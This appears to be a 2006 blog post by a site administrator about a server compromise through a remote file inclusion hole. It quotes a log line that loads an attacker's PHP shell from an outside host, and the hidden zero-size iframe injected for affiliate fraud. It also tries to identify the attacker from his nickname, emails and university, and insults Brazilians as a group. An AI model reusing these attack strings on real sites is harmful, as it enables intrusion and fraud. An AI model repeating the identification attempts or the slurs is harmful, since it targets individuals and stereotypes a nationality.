We just found some html attached to the end of every html and php file for almost all of our sites. How come, we asked?
I took a look at the server logs for every domain. I was looking for a POST request, since I figured out that it must had been some script kiddie trying to break into our pages with this dumb method. In little time I found that, something as suspicious as the following:
18.104.22.168 - - [27/May/2006:22:40:52 +0000] "GET /index.php?go=http%3A%2F%2Fwww.tnwhunters.com%2Fcmd01.txt%3F&&s=r&cmd=dir&dir=. HTTP/1.1" 200 3819 "-" "Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.7.7) Gecko/20050421 Firefox/1.0.3 (Debian package 1.0.3-2)"If you open the included url (http://www.tnwhunters.com/cmd01.txt) you see that the server is returning a plain text file which was interpreted as php by the script in neonv2, hence adding all the code that he put on that file available to him. (Obviously we have fixed it immediately and you can't do it anymore). Also, the page for server itself is related to animal huntings, which is completely offtopic. Weird... That code (take a look, it won't open any pop up... it's simple plain text) is a complete control panel for wannabe hackers. They just need to look for a site with a simple method of loading sections (i.e., including one file depending on the current section) and just explode it, by getting their control panel loaded. Which curiously is half written in Brazilian. The IP of the idiot also corresponds to Brazil, Sao Paulo, as verified by dnsstuff. The question is why did this idiot add this piece of html to every page and script? Not for becaming famous since the script doesn't produce any visible output. No. It's because he wanted to earn money. So he added a code like this:
iframe width=0 height=0 frameborder=0 xsrc=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 ...
This code apparently belongs to an affiliates programme (sited in China) in which he would get paid for each impression the servers at free20 received with his affiliate program. As he included it in an iframe, the page was loaded on the users' computers but never seen, since the iframe dimensions are 0x0 pixels. But he is so stupid that he uses the same affiliate code as the nick he uses for:
- submitting security announcements (which curiously corresponds to the same description of the vulnerabilities he explodes for earning money)
- signing up in gmail (email@example.com)
- writing in forums defending the hackers against the system, also providing another e-mail address: firstname.lastname@example.org. This address could correspond to his real name initials.
There are also some posts in the forum of a Computer Science institute with the same nick, Soauker. Although the page does not exist anymore, Google's cache can show you his favourite topics, which still are referred to linux. So maybe someone at the Instituto de Informática - PUCMINAS knows a guy which studied there on 2004 and was deeply interested in hacking and *nix systems.
So brazilians hadn't enough with spamming our nice orkut's scrapbooks with crap messages, now they also try to earn money the quick way. Ridiculous...
It is a pity that I can't find any website or abuse e-mail address for his internet provider so I could send them the logs he produced, but anyway I hope this is useful for someone.
Final advice: always always always filter input arguments for your script.
And for Soauker: GET A FUCKING LIFE!